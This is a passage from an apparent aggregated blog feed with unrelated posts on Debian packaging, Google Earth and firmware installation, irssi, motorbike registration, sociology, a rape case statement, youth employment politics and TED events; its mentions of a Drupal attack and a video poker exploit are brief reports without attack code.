    So... looking at my logs from the last two days, Suhosin has not let any such attack reach Drupal (or I have been h4x0red and the logs have all been cleaned — Cannot dismiss that possibility :-) )

    Anyway... We shall see many such attempts in the next weeks :-|

    [update] Yes, I'm not the only one reporting this attack in the wild. Zion Security explains the same attempt I logged: It attempts to inject PHP code so it can be easily executed remotely (and game over for the admin!)

    For the more curious, Tamer Zoubi explains the nature and exploitation of this bug.

    Planet DebianErich Schubert: Google Earth on Linux

    Google Earth for Linux appears to be largely abandoned by Google, unfortunately. The packages available for download cannot be installed on a modern amd64 Debian or Ubuntu system due to dependency issues.
    In fact, the adm64 version is a 32 bit build, too. The packages are really low quality, the dependencies are outdated, locales support is busted etc.
    So here are hacky instructions how to install nevertheless. But beware, these instructions are a really bad hack.
    1. These instructions are appropriate for version Do not use them for any other version. Things will have changed.
    2. Make sure your system has i386 architecture enabled. Follow the instructions in section "Configuring architectures" on the Debian MultiArch Wiki page to do so
    3. Install lsb-core, and try to install the i386 versions of these packages, too!
    4. Download the i386 version of the Google Earth package
    5. Install the package by forcing dependencies, via
      sudo dpkg --force-depends -i google-earth-stable_current_i386.deb
    6. As of now, your package manager will complain, and suggest to remove the package again. To make it happy, we have to hack the installed packages list. This is ugly, and you should make a backup. You can totally bust your system this way... Fortunately, the change we're doing is rather simple. As admin, edit the file /var/lib/dpkg/status. Locate the section Package: google-earth-stable. In this section, delete the line starting with Depends:. Don't add in extra newlines or change anything else!
    7. Now the package manager should believe the dependencies of Google Earth are fulfilled, and no longer suggest removal. But essentially this means you have to take care of them yourself!
    Some notes on using Google Earth:
    • Locales are busted. Use LC_NUMERIC=en_US.UTF-8 google-earth to start it. Otherwise, it will fail parsing coordinates, if you are in a locale that uses a different number format.
    • You may need to install the i386 versions of some libraries, in particular of your OpenGL drivers! I cannot provide you with a complete list.
    • Search doesn't work sometimes for me.
    • Occassionally, it reports "unknown" network errors.
    • If you upgrade Nvidia graphics drivers, you will usually have to reboot, or you will see graphics errors.
    • Some people have removed/replaced the bundled libQt* and libfreeimage* libraries, but that did not work for me.

    Planet DebianTanguy Ortolo: Trying systemd [ OK ] Switching back to SysV [ OK ]

    Since systemd is now the default init system under Debian Jessie, it got installed to my system and I had a chance to test it. The result is disappointing: it does not work well with cryptsetup, so I am switching back to SysV init and RC.

    The problem comes from the fact that I am using encrypted drives with cryptsetup, and while this is correctly integrated with SysV, it just sucks with systemd, where the passphrase prompt is mixed up with service start messages, a bit like that (from memory, since I did not take a picture of my system booting):

    Enter passphrase for volume foobar-crypt:
    [ OK ] Sta*rting serv*ice foo**
    [ OK ] ***Starting service bar**
    [ OK ] Starting service baz****

    The stars correspond to the letters I type, and as you can see, as the passphrase prompt does not wait for my input, they get everywhere in the boot messages, and there is no clear indication that the passphrase was accepted. This looks like some pathological optimization for boot speed, where even interactive steps are run in parallel with services startup: sorry, but this is just insane.

    There may exist ways to work around this issue, but I do not care: SysV init works just fine with no setup at all, and I since have no real need for another init system, systemd as a replacement is only acceptable if it works at least as fine for my setup, which is not the case. Goodbye systemd, come back when you are ready.

    Sociological Images“Rental Dreads”: Female Sex Tourists in the Caribbean

    Flashback Friday.

    While preparing a lecture on sex tourism, I ran across this video about men who have sex with female tourists in the Caribbean:

    <object data=";hl=en&amp;fs=1" height="344" type="application/x-shockwave-flash" width="425"><param name="allowFullScreen" value="true"/><param name="allowscriptaccess" value="always"/><param name="src" value=";hl=en&amp;fs=1"/><param name="allowfullscreen" value="true"/></object>

    There’s a lot of interesting stuff going on there, no? I was fascinated by the female hotel owner who talks about the men “preying” on the female tourists, clearly placing the power in the hands the men who, she argues, use the female tourists for money but don’t really care about them. I tried to imagine someone talking similarly about female sex workers “preying” on foreign men’s need for affection and attention.

    This might make for a great discussion about perceptions of sexual agency: how do gendered sexual norms, economic differences, and the different races and nationalities of the individuals involved affect how we think of their interactions and who we see as the victim?

    In her chapter on sex tourism in Race, Ethnicity, and Sexuality), sociologist Joane Nagel discusses the role of racialized sexualities in making some groups attractive tourists looking for an ethnosexual adventure. In the Caribbean, dark-skinned men with dreads are particularly attractive to some female tourists because of stereotypes of Black men as extremely sexual and masculine, which plays into fantasies of being swept away by a strong, skilled lover. At the same time, White Western women may represent the possibility of a better life (through continued gifts of money even after the vacation is over) and sexualized adventures to the men they sleep with while on vacation. Nagel argues that these encounters generally reinforce, rather than challenge, existing racial and gender inequalities, since they play on stereotypes of sexualized Others as animalistic, primitive, and, in the case of men, as super-masculine (and super-endowed).

    Then again, Nagel also questions whether any relationship between tourists and “local” men should count as sex work. The individuals involved don’t necessarily think of their interactions in those terms. And who is to decide if a particular situation is “sex tourism” as opposed to a “real” relationship? How does that assumption invalidate the possibility that Black men and White women might have real, meaningful relationships? Or primarily sexual relationships, but with both partners respecting the other?

    Originally posted in 2009.

    Gwen Sharp is an associate professor of sociology at Nevada State College. You can follow her on Twitter at @gwensharpnv.

    (View original at

    Planet DebianLucas Nussbaum: Debian Package of the Day revival (quite)

    TL;DR: static version of, as it was when it was shut down in 2009, available!

    A long time ago, between 2006 and 2009, there was a blog called Debian Package of the Day. About once per week, it featured an article about one of the gems available in the Debian archive: one of those many great packages that you had never heard about.

    At some point in November 2009, after 181 articles, the blog was hacked and never brought up again. Last week I retrieved the old database, generated a static version, and put it online with the help of DSA. It is now available again at Some of the articles are clearly outdated, but many of them are about packages that are still available in Debian, and still very relevant today.

    Planet DebianRhonda D'Vine: New Irssi

    After a long time a new irssi upstream release hit the archive. While the most notable change in 0.8.16 was DNSSEC DANE support which is enabled (for linux, src:dnsval has issues to get compiled on kFreeBSD), the most visible change in 0.8.17 was addition of support for both 256 colors and truecolor. While the former can be used directly, for the later you have to explicitly switch the setting colors_ansi_24bit to on. A terminal support it is needed for that though. To test the 256 color support, your terminal has to support it, your TERM environment variable has to be properly set, and you can test it with the newly added /cubes alias. If you have an existing configuration, look at the Testing new Irssi wiki page which helps you get that alias amongst giving other useful tipps, too.

    The package currently only lives in unstable, but once it did flow over to testing I will update it in wheezy-backports, too.


    /debian | permanent link | Comments: 0 | Flattr this

    Planet Linux AustraliaPaul Wayper: That time that I registered an electric vehicle

    So, tell us a story, Uncle Paul.

    Sure. One time when I was in Rovers, ...

    No, tell us the story of how you got your electric motorbike registered!

    Oh, okay then.

    It was the 20th of February - a Friday. I'd taken the day off to get the bike registered. I'd tried to do this a couple of weeks before then, but I found out that, despite being told a month beforehand that the workload on new registrations was only a couple of days long, when I came to book it I found out that the earliest they could do was the 20th, two weeks away. So the 20th it was.

    That morning I had to get the bike inspected by the engineer, get his sign-off, and take it down to the motor registry to get it inspected at 8:30AM. I also had to meet the plumber at our house, which meant I left a bit late, and by the time I was leaving the engineer it was already 8:15AM and I was in traffic. Say what you like about Canberra being a small town, but people like driving in and the traffic was a crawl. I rang the motor registry and begged for them to understand that I'd be there as soon as possible and that I might be a couple of minutes late. I squeaked into the entrance just as they were giving up hope, and they let me in because of the novelty of the bike and because I wasn't wasting their time.

    The roadworthy inspection went fairly harmlessly - I didn't have a certificate from a weighbridge saying how heavy it was, but I knew it was only about eight kilos over the original bike's weight, so probably about 240 kilos? "OK, no worries," they said, scribbling that down on the form. The headlights weren't too high, the indicators worked, and there was no problem with my exhaust being too loud.

    (Aside: at the inspection station there they have a wall full of pictures of particularly egregious attempts to get dodgy car builds past an inspection. Exhaust stuffed full of easily-removable steel wool? Exhausts with bit burnt patches where they've been oxy'd open and welded shut again? Panels attached with zip ties? Bolts missing? Plastic housings melted over ill-fitted turbos? These people have seen it all. Don't try to fool them.)

    Then we came up to the really weird part of my dream. You know, the part where I know how to tap dance, but I can only do it while wearing golf shoes?

    Er, sorry. That was something else. Then we came to the weird part of the process.

    Modified vehicles have to get a compliance plate, to show that they comply with the National Code of Practice on vehicle conversions. The old process was that the engineer that inspected the vehicle to make sure it complied had blank compliance plates; when you brought the vehicle in and it passed their inspection, they then filled out all the fields on the plate, attached the plate to the vehicle, and then you transported it down to Main Roads. But that was a bit too open to people stealing compliance plates, so now they have a "better" system. What I had to do was:

    1. Get the bike inspected for road worthiness.
    2. They hand me a blank compliance plate.
    3. I then had to take it to the engineer, who told me the fields to fill in.
    4. He then told me to go to a trophy making place, where they have laser etchers that can write compliance plates beautifully.
    5. I arrive there at 11AM. They say it'll be done by about 2PM.
    6. Go and have lunch with friends. Nothing else to do.
    7. Pick etched compliance plate up.
    8. Take compliance plate back to engineer. Because he's busy, borrow a drill and a rivet gun and attach the plate to the bike myself.
    9. Take it back to Main Roads, who check that the plate is attached to the bike correctly and stamp the road worthiness form. Now I can get the bike registered.
    Yeah, it's roundabout. Why not keep engrave the plates at Main Roads with the details the Engineer gives to them? But that's the system, so that's what I did.

    And so I entered the waiting department. It only probably took about fifteen minutes to come up next in the queue, but it was fifteen minutes I was impatient to see go. We went through the usual hilarious dance with values:

    • Her: What are you registering?
    • Me: An electric motorbike.
    • Her: How many cylinders?
    • Me: Er... it's electric. None.
    • Her: None isn't a value I can put in.
    • Me: (rolls eyes) OK, one cylinder.
    • Her: OK. How many cubic centimetres?
    Many months ago I had enquired about custom number plates, and it turns out that motorbikes can indeed have them. Indeed, I could by "3FAZE" if I wanted. For a mere $2,600 or so. It was very tempting, but when I weighed it up against getting new parts for the bike (which it turned out I would need sooner rather than later, but that's a story for another day) I thought I'd save up for another year.

    So I finally picked up my new set of plates, thanked her for her time, and said "Excuse me, but I have to do this:" and then yelled:


    Well, maybe I kept my voice down a little. But I had finally done it - after years of work, several problems, one accident, a few design changes, and lots of frustration and gradual improvement, I had an actual, registered electric motorbike I had built nearly all myself.

    I still get that feeling now - I'll be riding along and I'll think, "wow, I'm actually being propelled along by a device I built myself. Look at it, all working, holding together, acting just like a real motorbike!" It feels almost like I've got away with something - a neat hack that turns out to work just as well as all those beautifully engineered mega-budget productions. I'm sure a lot of people don't notice it - it does look a bit bulky, but it's similar enough to a regular motorbike that it probably just gets overlooked as another two-wheeled terror on the roads.

    Well, I'll just have to enjoy it myself then :-)

    Planet DebianPetter Reinholdtsen: Debian Jessie, PXE and automatic firmware installation

    When PXE installing laptops with Debian, I often run into the problem that the WiFi card require some firmware to work properly. And it has been a pain to fix this using preseeding in Debian. Normally something more is needed. But thanks to my isenkram package and its recent tasksel extension, it has now become easy to do this using simple preseeding.

    The isenkram-cli package provide tasksel tasks which will install firmware for the hardware found in the machine (actually, requested by the kernel modules for the hardware). (It can also install user space programs supporting the hardware detected, but that is not the focus of this story.)

    To get this working in the default installation, two preeseding values are needed. First, the isenkram-cli package must be installed into the target chroot (aka the hard drive) before tasksel is executed in the pkgsel step of the debian-installer system. This is done by preseeding the base-installer/includes debconf value to include the isenkram-cli package. The package name is next passed to debootstrap for installation. With the isenkram-cli package in place, tasksel will automatically use the isenkram tasks to detect hardware specific packages for the machine being installed and install them, because isenkram-cli contain tasksel tasks.

    Second, one need to enable the non-free APT repository, because most firmware unfortunately is non-free. This is done by preseeding the apt-mirror-setup step. This is unfortunate, but for a lot of hardware it is the only option in Debian.

    The end result is two lines needed in your preseeding file to get firmware installed automatically by the installer:

    base-installer base-installer/includes string isenkram-cli
    apt-mirror-setup apt-setup/non-free boolean true

    The current version of isenkram-cli in testing/jessie will install both firmware and user space packages when using this method. It also do not work well, so use version 0.15 or later. Installing both firmware and user space packages might give you a bit more than you want, so I decided to split the tasksel task in two, one for firmware and one for user space programs. The firmware task is enabled by default, while the one for user space programs is not. This split is implemented in the package currently in unstable.

    If you decide to give this a go, please let me know (via email) how this recipe work for you. :)

    So, I bet you are wondering, how can this work. First and foremost, it work because tasksel is modular, and driven by whatever files it find in /usr/lib/tasksel/ and /usr/share/tasksel/. So the isenkram-cli package place two files for tasksel to find. First there is the task description file (/usr/share/tasksel/descs/isenkram.desc):

    Task: isenkram-packages
    Section: hardware
    Description: Hardware specific packages (autodetected by isenkram)
     Based on the detected hardware various hardware specific packages are
    Test-new-install: show show
    Relevance: 8
    Packages: for-current-hardware
    Task: isenkram-firmware
    Section: hardware
    Description: Hardware specific firmware packages (autodetected by isenkram)
     Based on the detected hardware various hardware specific firmware
     packages are proposed.
    Test-new-install: mark show
    Relevance: 8
    Packages: for-current-hardware-firmware

    The key parts are Test-new-install which indicate how the task should be handled and the Packages line referencing to a script in /usr/lib/tasksel/packages/. The scripts use other scripts to get a list of packages to install. The for-current-hardware-firmware script look like this to list relevant firmware for the machine:

    export PATH
    isenkram-autoinstall-firmware -l

    With those two pieces in place, the firmware is installed by tasksel during the normal d-i run. :)

    If you want to test what tasksel will install when isenkram-cli is installed, run DEBIAN_PRIORITY=critical tasksel --test --new-install to get the list of packages that tasksel would install.

    Debian Edu will be pilots in testing this feature, as isenkram is used there now to install firmware, replacing the earlier scripts.

    CryptogramHacking a Video Poker Machine

    Kevin Poulsen has written an interesting story about two people who successfully exploited a bug in a popular video poker machine.

    Worse Than FailureError'd: Sorry, but You Can't Do the Math

    "I guess that Intuit might have reasons for not allowing me to say Math was my least favorite subject in school," writes Alan R.


    "I really wanted to buy an audiobook or three, but I doubt it would be prudent considering the price," wrote L. H.


    Based on Petrea M's error, I have to wonder if there's also a TRUE and FALSE were also beginning in Hearthstone.


    "Even if nobody is in line at McDonalds, turns out it can still get pretty busy," writes Bob W.



    "At first, I was a little concerned that iFixit didn't carry the tool I needed to fix my Wii U," Tyler writes, "Thank goodness iFixit had it in stock!"


    Jan wrote, "I'm not sure that these are the enterprise experts that I want to work with!"


    "Sadly, I don't think that I'm smart enough to sign up," Sam P. writes.


    "While browsing Careers 2.0, I noticed this Amazon job," wrote Caleb, "I don't think that applying would be good for my self-esteem."


    Planet Linux AustraliaAndrew Pollock: [life] Day 261: Lots of play dates with boys, TumbleTastics, and a fairy gathering

    Today was a typical jam packed day. Zoe had a brief wake up at at some point overnight because she couldn't find Cowie, right next to her head, but that was it.

    First up, the PAG fundraising committee come over for a quick (well, more like 2 hour) meeting at my place to discuss planning for the sausage sizzle tomorrow. Because I don't have Zoe, I've volunteered to do a lot of the running around, so I'm going to have a busy day.

    Mel had brought Matthew and Olivia with her, so Zoe and Matthew had a good time playing, and Olivia kept trying to join in.

    That meeting ran right up until I realised we had to head off for TumbleTastics, so Zoe got ready in record time and we scootered over and made it there just as her class was starting. I was sure we were going to be late, so I was happy we made it in time.

    Lachlan and his Mum, Laura, and little sister came over for lunch again afterwards, and stayed for a little while.

    After they left, we started getting ready for the Fairy Nook's attempt to break the Guiness Book of Records record for the most fairies in one place. We needed to get a wand, so once Zoe was appropriately attired, we walked around the corner to Crackerjack Toys and picked up a wand.

    After that, I popped up to Mel's place to collect a whole bunch of eskies that the local councillor had lent us for the sausage sizzle. Mel had also picked up a tutu for Zoe from the local two dollar store in her travels.

    We got home, and then walked to the Hawthorne AFL oval where the record attempt was. Initially there were like two other fairies there, but by 4:30pm, there was a pretty good turnout. I don't know what the numbers were, but I'm pretty sure they were well under the 872 they needed. There was a jumping castle and a few of Zoe's friends from Kindergarten, so it was all good.

    Sarah arrived to pick up Zoe from there, and I walked home.


    Kelvin ThomsonWe Must Tackle Youth Unemployment

    I believe that local communities working together with local businesses, local government and social services can play an important role in helping build meaningful partnerships between young people and job opportunities in the current economic climate. <o:p></o:p>

    I support the Jobs for Youth Campaign which will be running across Moreland, Darebin and Yarra in October, which aims to match 100 people aged 16 to 24 with local employment opportunities, and attempt to stem joblessness in our region.<o:p></o:p>

    The Jobs Expos being hosted as part of the campaign will put young people directly in touch with real employers and real job opportunities, including McDonald’s, Aplus Apprenticeships, Traineeship services along with other businesses and agencies. Young people are encouraged to bring along their resumes, or can seek help by making one there. The Darebin Jobs Expo will be held on Tuesday, October 21 at NCAT Preston, Yarra Expo on Wednesday, October 29 at The Reading room Fitzroy, and the Moreland Expo will be held on Friday, October 31 at the Coburg Town Hall.<o:p></o:p>

    The Real Industry Job Interview (RIJI) Program has recruited volunteers to participate as interviewers this coming Friday, October 17. The Program will engage almost 700 young people from local schools from the Cities of Yarra, Darebin and Moreland; to assist and guide them in resume, job interview and job application preparations. This sort of program is highly beneficial for young local jobseekers and students as they seek to enter the a very tight and competitive job market. I will be participating in the interview day and am looking forward to helping give young people some hints and tips about effective ways they can apply and succeed in looking for work.<o:p></o:p>

    In April I met with local Youth Connections providers, and wrote to the current Liberal Government to support the Youth Connections program that was set up by Labor in 2010 to stop young people falling between the cracks. Youth Connections has already helped 75,000 young people reengage with education and employment. The program helps young people who drop out of school either head back to the classroom, or complete an alternative year 12 qualification, combined with work. It is disgraceful the Liberal Government has refused to support ongoing investment in such programs.<o:p></o:p>

    These are great initiatives and I commend Moreland City Council, City of Darebin, City of Yarra, Youth Connections, Darebin Youth Commitment, Moreland Youth Commitment, Yarra Youth Commitment, and Inner Northern Learning, for spearheading the need for more young people to be employed and engaged locally. More information on these initiatives can be found at <o:p></o:p>

    Victorian Labor’s Jobs Plan which will help create 100,000 full time jobs for the unemployed through the $100 million Back to Work Act, payroll tax relief, incentives for business to hire long term unemployed, retrenched workers and unemployed youth, the Premier’s Jobs and Investment Panel, a Future Industries Fund of $200 million, a Regional Jobs Fund, Super Trade Missions, and through the removal of 50 level crossings, build the Melbourne Metro Rail, removing 5,000 trucks from the Westgate Bridge, creating 10,00 construction jobs and guaranteeing $2 billion for country and suburban roads. These are all worthy initiatives that will begin to kick start job opportunities for our unemployed young people.<o:p></o:p>

    Along with investing in our manufacturing, skills and education sectors, supporting our local community initiatives, the Federal and State Victorian Liberal Governments would be better off cutting back our migrant worker programs that are placing unfair competition on local young people’s chance of getting a job.<o:p></o:p>

    Under the current approach they’re adopting, youth unemployment will get a lot worse before it gets better. Providing young people with good quality job opportunities from an early stage helps our overall economic and social wellbeing by giving our next generation hope. Hope that they can make a good income, hope they can hold a decent standard of living, hope that they can one day buy their own home, raise a family, and live a comfortable, safe and healthy life. Giving young people the chance to build their self-respect, resilience and dignity, is incredibly important and goes hand in hand with giving young people the chance of having a job.<o:p></o:p>

    Planet Linux News: Speaker Feature: Laura Bell, Michael Cordover

    Laura Bell

    Laura Bell

    Why can't we be friends? Integrating Security into an Existing Agile SDLC

    3:40pm Friday 16th January 2015

    Laura describes herself as an application security wrangler, repeat dreamer, some-time builder, python juggler, Mom and wife.

    For more information on Laura and her presentation, see here. You can follow her as @lady_nerd and don’t forget to mention #LCA2015.

    Michael Cordover

    Michael Cordover

    Using FOI to get source code: the EasyCount experience

    3:40pm Wednesday 14th January 2015

    Michael is interested in the law, science, politics and everything in between. He worked in computing, event management and project management. He a policy wonk and systems-oriented and he loves variety but is interested in detail.

    His life goal as a child was to know everything. He says that's impossible but is still trying to get as close as he can.

    For more information on Michael and his presentation, see here. You can follow him as @mjec and don’t forget to mention #LCA2015.

    LongNowKevin Kelly Seminar Tickets


    The Long Now Foundation’s monthly

    Seminars About Long-term Thinking

    Kevin Kelly presents Technium Unbound

    Kevin Kelly presents “Technium Unbound”


    Wednesday November 12, 02014 at 7:30pm SFJAZZ Center

    Long Now Members can reserve 2 seats, join today! General Tickets $15


    About this Seminar:

    What comes after the Internet? What is bigger than the web? What will produce more wealth than all the startups to date? The answer is a planetary super-organism comprised of 4 billion mobile phones, 80 quintillion transistor chips, a million miles of fiber optic cables, and 6 billion human minds all wired together. The whole thing acts like a single organism, with its own behavior and character — but at a scale we have little experience with.

    This is more than just a metaphor. Kelly takes the idea of a global super-organism seriously by describing what we know about it so far, how it is growing, where its boundaries are, and what it will mean for us as individuals and collectively. Both the smallest one-person enterprises today, and the largest mega-corporations on Earth, will have to learn to how this Technium operates, and how to exploit it.

    TEDWant to learn how to give a great talk? Chris Anderson is writing the official TED guide to public speaking

    In the book, "Talk This Way! The Official TED Guide to Public Speaking," our curator Chris Anderson will gives insights on what makes a talk great. Photo: James Duncan Davidson

    In the upcoming book “Talk This Way! The Official TED Guide to Public Speaking,” our curator Chris Anderson will give insights on what makes a talk great. Photo: James Duncan Davidson

    Over and over, you keep asking us: What’s the best way to give a TED Talk? It’s not just that you’re interested in sharing your ideas at a TED or local TEDx event. Short presentations have become a bread-and-butter staple at schools and offices around the world, and you want more guidance on how to give them well.

    And so, our curator Chris Anderson is writing a book to be published by Houghton Mifflin Harcourt in spring 2016. Titled Talk This Way! The Official TED Guide to Public Speaking, it will be packed with insights on what makes talks work.

    “There was no one spark for writing this book—it’s more like a long-smoldering fire that’s now ready to break out,” he told the TED Blog. “A decade ago, speaker prep at TED was simple: We’d agree on a basic talk idea, send the speaker a plaque of ‘the TED Commandments’ and wait to see what they showed up with. In recent years we’ve been stepping up our pre-conference engagement with speakers, encouraging them to carry out early rehearsals, working with some of them on their scripts. We’ve found the process to be incredibly valuable. We’ve seen speakers who start out nervous and/or with unfocused ideas come through to give truly compelling talks.”

    One of the main points: there simply is no one-size-fits-all approach. 

    “We should be clear on one thing. There is no single formula to giving a TED Talk. Indeed, the most annoying talks of all are those that seem to think there is,” he says. “But at the same time, there’s a ton of important advice to offer, including a key metaphor that many speakers find helpful. I’ll offer all the guidance I can, but much of it is in helping speakers to find the type of talk that’s right for them. And by the way, the book isn’t just for TED Talks. It’s meant to be helpful for any form of public speaking or presentation.”

    Another key goal for the book: highlighting the amazing power of direct human-to-human communication, recorded on video, in the Internet age.

    While we hope that this book will be helpful to you, we also see it as another way to foster TED’s mission of sharing ideas for free to the world. All proceeds from the book — from the advance to sales — will be donated to TED’s nonprofit parent company, and will support the free sharing of TED Talks and other free programs around the world.

    The book will be available internationally. So far, rights have been negotiated in Canada, Brazil, China, the Czech Republic, Finland, Germany, Greece, Hungary, Israel, Italy, Japan, Russia, Spain, Sweden, Taiwan and the UK, and deals are in progress in France, Poland and Portugal.

    Have specific questions about giving a talk that you’d like answered in the book? Email and we’ll pass them on to Chris. Who is busily typing away on this book as we speak.

    “It’s fun!” he tells us. “I mean, not all the time — I can definitely get hit with intense writer’s block. But when it flows, it’s really exciting. There’s so much great material to tap into. Examples from hundreds of different TED Talks, and the direct advice from about 30 favorite speakers who have been generous enough to share their wisdom. If all I do is channel them, all will be well.”

    Geek FeminismRe-stating our support for the victim/survivor in the Dana McCallum case

    [Content warning: rape]

    Back in April, we published a statement of support for the victim in the Dana McCallum rape case. In the letter — written by Liz Henry and co-signed by Leigh Honeywell, Valerie Aurora, Brenda Wallace, Tim Chevalier (me), Annalee Flower Horne, and Beth Flanagan — we stated our empathy and support for the victim/survivor — who is McCallum’s wife (they are in the process of divorcing) — in this case as well as for her family.

    This month, McCallum accepted a guilty plea for two misdemeanors in this case: one count of domestic violence with corporal injury to the spouse and one count of false imprisonment. McCallum will serve probation, community service, and will have to undergo counseling. We already included this link in a linkspam, but given our previous statement of support for McCallum’s victim, I want to reiterate that support.

    As Liz wrote in our statement of support back in April, “Rape is a horrible violent crime no matter who the rapist is.” McCallum’s wife read a statement that says, in part:

    I must say that it deeply saddens me that as a victim, my only public support has been from hate groups. I expected more from the LGBT and feminist community. It’s a shame that they can’t do the emotional work it requires to process that someone they love is capable of such an awful crime. That is their burden to carry, though.

    In April, we also expressed disappointment in the transmisogynistic response to McCallum’s crime. As geek feminists, we believed then, and do now, that we can and must accept that someone in our community is capable of the crime of rape. Hard as it may be to accept, self-identified feminists can sustain rape culture — up to and including actually committing rape — too. We also believe that at the same time, we must resist the narrative that would use this crime to de-gender or misgender McCallum and, by extension, trans women. Rape can be committed by anyone, regardless of their assigned sex at birth or their self-affirmed sex or gender. Structural power dynamics and rape culture mean it’s far more likely to be committed by cis men than by people in any other group, but that is a fact that needs to inform anti-rape organizing — it does not make rapes committed by specific non-cis, non-male people less damaging.

    McCallum’s wife also said that she still loves McCallum and wants “forgiveness” to prevail. The Revolution Starts at Home (PDF link) is recommended reading for anyone curious about what that might look like.

    Edited to add: McCallum’s ex has also written a public blog post, as a guest post on Helen Boyd’s blog, about her experience:

    The transphobic radical feminists and other transphobic people will continue to rage over the state of my wife’s genitals, and I can’t stop them. But I hope more intelligent and thoughtful people will rise to the occasion to steer the conversation to what really matters.

    I want her to be accountable. I want this to never happen again. I want to forgive her. I want this story to be about forgiveness and redemption. I need it to be. I need others to let it be that, too – to be my story, my trauma, my choice, my agency.

    I recommend reading the post, but not the comments.

    Planet DebianBits from Debian: Help empower the Debian Outreach Program for Women

    Debian is thrilled to participate in the 9th round of the GNOME FOSS Outreach Program. While OPW is similar to Google Summer of Code it has a winter session in addition to a summer session and is open to non-students.

    Back at DebConf 14 several of us decided to volunteer because we want to increase diversity in Debian. Shortly thereafter the DPL announced Debian's participation in OPW 2014.

    We have reached out to several corporate sponsors and are thrilled that so far Intel has agreed to fund an intern slot (in addition to the slot offered by the DPL)! While that makes two funded slots we have a third sponsor that has offered a challenge match: for each dollar donated by an individual to Debian the sponsor will donate another dollar for Debian OPW.

    This is where we need your help! If we can raise $3,125 by October 22 that means we can mentor a third intern ($6,250). Please spread the word and donate today if you can at:

    If you'd like to participate as intern, the application deadline is the same (October 22nd). You can find out more on the Debian Wiki.

    TEDNew ideas from a small island: A support group for women in business, inspired by TEDxNicosiaWomen

    A talk at TEDxNicosiaWomen lead to a thriving discussion group for female business leaders on an island where such a thing is a rarity. Photo: Andri Josef/AJPhotoart

    A talk at TEDxNicosiaWomen lead to a thriving discussion group for female business leaders on an island where such a thing is a rarity. Photo: Andri Josef/AJPhotoart

    One morning, as Anna Koukkides-Procopiou was rushing out of her house on the way to the office, her daughter said, “Mommy, I want you here. Why don’t you want me?” This set off a long period of contemplation, and eight months later, she left the business world and reinvented herself as an activist — and started bringing her daughter along with her to meetings.

    “I realized that the problem was actually the solution I didn’t want to see,” she said in a talk at TEDxNicosiaWomen 2013, held on the Mediterranean island of Cyprus.

    Her talk—about how women have to make the decisions that feel right for them—sent a ripple of excitement through the audience.

    “Cyprus is a very small community. It’s a small island,” says Mahi Solomou, who organized TEDxNicosiaWomen and invited Koukkides-Procopiou to speak. “Anna’s talk was so special for the Cyprus community because it got women to think that, at the end of the day, this is your life. Anna was criticized for taking off from the corporate world, but she did what felt right to her. It was a powerful message for the women out there.”

    “She really had a big impact on the audience,” echoes Thalia Iacovou, a designer who was in the audience for this talk. “A lot of people identified with her. After, they were saying, ‘Wow, she’s inspiring. She’s given us a lot to think about.’”

    Just a few hours later, the event screened a session of TEDWomen 2013 in which Sheryl Sandberg gave an update on her classic talk and mentioned the phenomenon of Lean In Circles, small groups where women can meet to talk and support one another. With some urging from Solomou and from TEDxNicosia organizer Paul Koronis, Koukkides-Procopiou decided to launch a similar group, with a Cypriot twist.

    In March, this discussion group convened for the first time in a coffee shop, bringing together 11 women with very different business backgrounds. Koronis and Solomou served as hosts; Koukkides-Procopiou moderated. The purpose of the group: to get the women talking about their experiences, so that they could learn from each other and offer support.

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src=";rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    Iacovou, who runs a digital brand agency with her husband, says a group like this was desperately needed in Cyprus, as gender parity in the workplace isn’t a tightly held value on the island. “In many places in the world, you start from the assumption that it doesn’t matter what gender you are: if you’re in business, you’re in business. There may be instances when there’s sexism, but those are isolated,” she says. “What we find here is different. When you’re [a woman] in business, you tend to be more isolated in the local community rather than embraced. It’s a little bit intimidating, a little difficult to understand.”

    This mindset has affected her personally, she says: “If I am running a workshop, or a pitch or a presentation, people look at my husband and go, ‘Why isn’t he doing the talking? Why is she doing the talking? She’s really bossy.’ I find myself almost stepping back sometimes and allowing my male counterparts to lead. You have to learn to read people in a different way than you might outside of Cyprus.”

    At the first meeting of the discussion group, things started off awkwardly. The women didn’t quite know what to make of each other. “It was very different from existing societies and clubs in Nicosia,” says Koronis, who was the only man in the room for the meeting. “Women here meet for coffee or for cards, but typically in closed circles of friends who’ve been together for years.”

    But as the meeting progressed, the group began to gel. It’s been going strong ever since, and recently held its eighth meeting. Here’s how it works:

    In the week before a meeting, each member of the group gets an email that describes the next session’s theme, along with a video to watch and some questions to think about. Each meeting begins with everyone giving a short update on what they’ve been up to in the past month. From there, it’s discussion time, the conversation flipping between English and Greek. So far, the group has tackled topics like team dynamics and public speaking—and they’re hosting a session soon about hierarchy in the workplace. As each meeting closes, they talk through action points each member can take.

    The audience, thoroughly rapt at TEDxNicosiaWomen. Photo: Andri Josef/AJPhotoart

    The audience, thoroughly rapt at TEDxNicosiaWomen. Photo: Andri Josef/AJPhotoart

    Iacovou says that the group has been transformative for her. “Listening to all the women talking about how they confidently move forward with things, it’s really shifted my tendency to step back,” she says. “In the months since I’ve been in the group, there have been two or three initiatives that I’ve just jumped on board with, without worrying, ‘Oh, I’m a woman, and how am I going to _______?’ I’ve bonded with people I wouldn’t have had an opportunity to interact with on a daily basis. I’ve gotten a lot of insights, on a personal level and on a professional level.”

    Solomou agrees. “They know about what I’m going through, so they can say, ‘We’ve been through the same thing and suggest this,’” she says. “I’m getting a lot of good advice.”

    Because of the conflict on the island between Greeks and Turks, and because Cyprus did not have a robust university system until recently, many members of the island’s business community have either studied or lived abroad. But many have returned in recent years, even with the recent financial crash, leading to what Koronis, Solomou, and Iacovou describe as an “entrepreneurial wave” — one in which they say women are participating. “For our generation of women, the culture is allowing them to take on more roles,” says Iacovou.

    The Nicosia group has caught the attention of others locally. Koukkides-Procopiou has been contacted by an individual working with the US Embassy in Nicosia, who asked how they could set up a similar group for their employees, and Koronis has had a conversation with an executive manager of a large bank in Athens, who was interested in bringing the idea to Greece.

    Meanwhile, the group continues to thrive. Koukkides-Procopiou is experimenting with what happens when group members are paired up randomly and keep each other on track toward specific goals.

    “Every time I go to these meetings, I get a dose of inspiration,” says Solomou. “Living on a small island, you always need new ideas.”

